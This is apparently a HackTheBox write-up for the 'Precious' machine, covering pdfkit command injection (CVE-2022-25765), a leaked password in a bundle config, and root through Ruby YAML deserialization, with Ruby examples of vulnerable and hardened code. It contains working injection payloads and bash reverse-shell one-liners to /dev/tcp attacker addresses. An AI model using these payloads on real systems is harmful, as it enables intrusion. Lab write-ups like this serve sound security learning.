HackTheBox — Precious

ARZ101
May 20


Precious is an easy-rated Linux machine. Its web site converts web pages to PDF with a version of pdfkit vulnerable to command injection (CVE-2022-25765), which gives us a shell as the ruby user. Henry's password is found in ruby's bundle config file. As henry, a dependency-checker script can be run as root; it parses a YAML file with yaml.load, which is vulnerable to Ruby deserialization.

NMAP

Nmap scan report for 10.10.11.189
Host is up (1.5s latency).
Not shown: 63496 closed tcp ports (reset), 2037 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visiting the web server redirects to precious.htb

Adding the domain to the /etc/hosts file

Here we can enter the URL of a web page, which the site converts into a PDF file. Trying http://localhost and http://127.0.0.1 is rejected.

Trying a remote URL did work.

Foothold

Running exiftool on the generated PDF, the metadata shows the version of pdfkit that produced it.

This version is vulnerable to command injection, CVE-2022-25765.

Following the commits made on pdfkit and the Snyk advisory: the input must start with http:// so pdfkit treats it as a URL, and a %20 must come before the command, which is placed in backticks. The affected version built the wkhtmltopdf command line as a single string and ran it through a shell, so the backtick command substitution is evaluated even though the URL is quoted.

http://%20`ping 10.10.14.72`

We can see the machine sending ICMP packets to our machine, confirming execution. From here we can get a shell using a bash payload:

http://%20`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.72/4444 0>&1"`
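To see why the %20-plus-backticks payload works, here is an added example (written for this writeup, not pdfkit's code nor the author's) that reproduces the bug class in Ruby. A command line assembled as one string and given to IO.popen is run through /bin/sh, which evaluates command substitution even inside double quotes. The `echo` program stands in for wkhtmltopdf so the child's argument is simply printed back; EXECUTABLE, PAYLOAD and the function names are this example's own. The hardened form passes argv as an array so no shell is involved, and a Shellwords.escape variant shows the string-based fix; neither is claimed to be pdfkit's exact patch.

```ruby
require "shellwords"

# Stand-in for wkhtmltopdf: `echo` prints its argument, so we can see exactly
# what the child process received. (Constructed for this example.)
EXECUTABLE = "echo"

# Constructed payload in the same shape as the one used against the box.
PAYLOAD = "http://%20`echo INJECTED`"

# Vulnerable pattern: the command line is assembled as ONE STRING and handed
# to IO.popen, which runs it through /bin/sh. Wrapping the URL in double
# quotes does not stop the shell from evaluating `...` substitutions.
def vulnerable_render(url)
  cmd = [EXECUTABLE, %("#{url}")].join(" ")
  IO.popen(cmd, &:read).strip
end

# Hardened pattern: pass argv as an ARRAY, so IO.popen execs the program
# directly and nothing inside the URL is ever interpreted by a shell.
def hardened_render(url)
  IO.popen([EXECUTABLE, url], &:read).strip
end

# String-based fix: escape the URL for the shell before joining. Safe, but
# only as long as every dynamic piece goes through Shellwords.escape.
def shell_escaped_render(url)
  cmd = [EXECUTABLE, Shellwords.escape(url)].join(" ")
  IO.popen(cmd, &:read).strip
end

if __FILE__ == $0
  puts "vulnerable:     #{vulnerable_render(PAYLOAD)}"     # backticks ran
  puts "argv array:     #{hardened_render(PAYLOAD)}"       # literal URL
  puts "shell-escaped:  #{shell_escaped_render(PAYLOAD)}"  # literal URL
end
```

The vulnerable call prints http://%20INJECTED, showing the inner `echo INJECTED` was executed by the shell; both fixed variants print the payload back verbatim.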

Running pspy doesn’t show anything interesting

Privilege Escalation (henry)

In ruby's home directory there is a .bundle folder whose config file contains henry's password, stored as credentials for a gem source.

Privilege Escalation (root)

Running sudo -l shows that henry can run /opt/update_dependencies.rb as root.

The script reads a dependency.yaml file and compares the versions listed there for yaml and pdfkit against the installed gems.

Because it parses that file with yaml.load (unsafe deserialization, which lets a YAML document instantiate arbitrary Ruby objects) and reads it by relative path from the current directory, this can be abused: create a dependency.yaml deserialization payload in a directory where henry has write access and run the script from there with sudo.

Replacing the id command in the yaml payload with a bash reverse shell gives us a root shell.

/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.92/2222 0>&1'
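The root cause is the loader, not the file. The following added example (written for this writeup, not the machine's script) shows with a harmless class what yaml.load did in Psych 3 (Ruby up to 3.0) and what YAML.safe_load does instead, then gives a hardened replacement for the script's file-reading function. The Note class, the two YAML documents and DEPENDENCIES_FILE are constructed for the example; Psych 4 made YAML.load safe and moved the old behaviour to YAML.unsafe_load, which the example picks up automatically.

```ruby
require "yaml"

# Constructed sample: a well-formed dependency list like the script expects.
GOOD_YAML = <<~YAML
  yaml: 0.1.1
  pdfkit: 0.8.6
YAML

# Harmless class standing in for the stdlib gadget classes a real payload
# would name. Any class the loader can resolve is fair game for YAML.load.
class Note
  attr_accessor :text
end

# Constructed sample: a document that tells the loader to build an object.
EVIL_YAML = <<~YAML
  --- !ruby/object:Note
  text: built by the YAML loader
YAML

# The behaviour the script relied on: arbitrary object construction.
# Psych < 4: YAML.load is unsafe. Psych >= 4: it lives in YAML.unsafe_load.
def legacy_load(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened loader: only plain scalars, arrays and hashes; no tags, no aliases.
def safe_dependency_list(doc)
  YAML.safe_load(doc, permitted_classes: [], aliases: false)
end

# True when the safe loader refuses the document instead of building objects.
def rejected_by_safe_load?(doc)
  safe_dependency_list(doc)
  false
rescue Psych::DisallowedClass
  true
end

# Hardened replacement for the script's reader: an absolute path fixed in the
# script (assumed location, for illustration) and the safe loader. Running
# the script from a different directory no longer changes which file it reads.
DEPENDENCIES_FILE = "/opt/dependency.yaml"
def list_from_file(path = DEPENDENCIES_FILE)
  safe_dependency_list(File.read(path))
end

if __FILE__ == $0
  puts "legacy loader built a #{legacy_load(EVIL_YAML).class}"
  puts "safe loader rejected it: #{rejected_by_safe_load?(EVIL_YAML)}"
  p safe_dependency_list(GOOD_YAML)
end
```

With the gadget classes shipped in rubygems, the same object construction the legacy loader performs on Note is what turns a YAML file into command execution; permitted_classes: [] is the setting that closes that door while still parsing the version list.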
